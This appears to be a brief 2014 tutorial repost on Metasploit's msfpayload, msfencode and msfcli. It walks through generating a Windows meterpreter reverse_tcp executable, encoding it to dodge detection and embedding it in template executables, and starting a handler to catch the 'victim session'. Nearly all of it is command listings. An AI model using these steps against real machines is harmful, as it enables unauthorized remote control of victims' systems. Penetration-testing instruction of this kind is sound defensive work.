Metasploit: standalone packaging and encoding of attack payloads

Date: 2014-06-28 20:15:31

Packaging the attack payload
msfpayload:
Usage:
msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]>
Summary: summary and options of the payload
C: C language
Perl: Perl
Ruby: Ruby
Raw: raw, allows the payload to be piped into msfencode and other tools
Js: JavaScript
eXe: Windows executable
Dll: DLL
Vba: VBA
War: WAR package

example:
msfpayload -l | grep windows | grep reverse_tcp | grep meterpreter
msfpayload windows/meterpreter/reverse_tcp O    (show options)
msfpayload [payload] X >xx.exe

Encoding the attack payload
msfencode:
Usage:
msfencode <options>
OPTIONS:
-a <opt>  The architecture to encode as
-b <opt>  The list of characters to avoid: '\x00\xff'
-c <opt>  The number of times to encode the data
-d <opt>  Specify the directory in which to look for EXE templates
-e <opt>  The encoder to use
-h        Help banner
-i <opt>  Encode the contents of the supplied file path
-k        Keep template working; run payload in new thread (use with -x)
-l        List available encoders
-m <opt>  Specifies an additional module search path
-n        Dump encoder information
-o <opt>  The output file
-p <opt>  The platform to encode for
-s <opt>  The maximum size of the encoded data
-t <opt>  The output format: bash,c,csharp,dw,dword,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,exe,exe-only,exe-service,exe-small,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,vba,vba-exe,vbs,war
-v        Increase verbosity
-x <opt>  Specify an alternate executable template

Receiving the victim session
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST x.x.x.x LPORT xxxx
msf exploit(handler) > exploit
[*] Started reverse handler on x.x.x.x:xxxx
[*] Starting the payload handler...

You can also use msfcli instead of opening msfconsole:
Usage:
msfcli <exploit_name> <option=value> [mode]
Mode           Description
----           -----------
(A)dvanced     Show available advanced options for this module
(AC)tions      Show available actions for this auxiliary module
(C)heck        Run the check routine of the selected module
(E)xecute      Execute the selected module
(H)elp         You're looking at it baby!
(I)DS Evasion  Show available ids evasion options for this module
(O)ptions      Show available options for this module
(P)ayloads     Show available payloads for this module
(S)ummary      Show information about this module
(T)argets      Show available targets for this exploit module

Examples:
msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E
msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=6555 E

Original article: http://www.cnblogs.com/Chorder/p/3794655.html
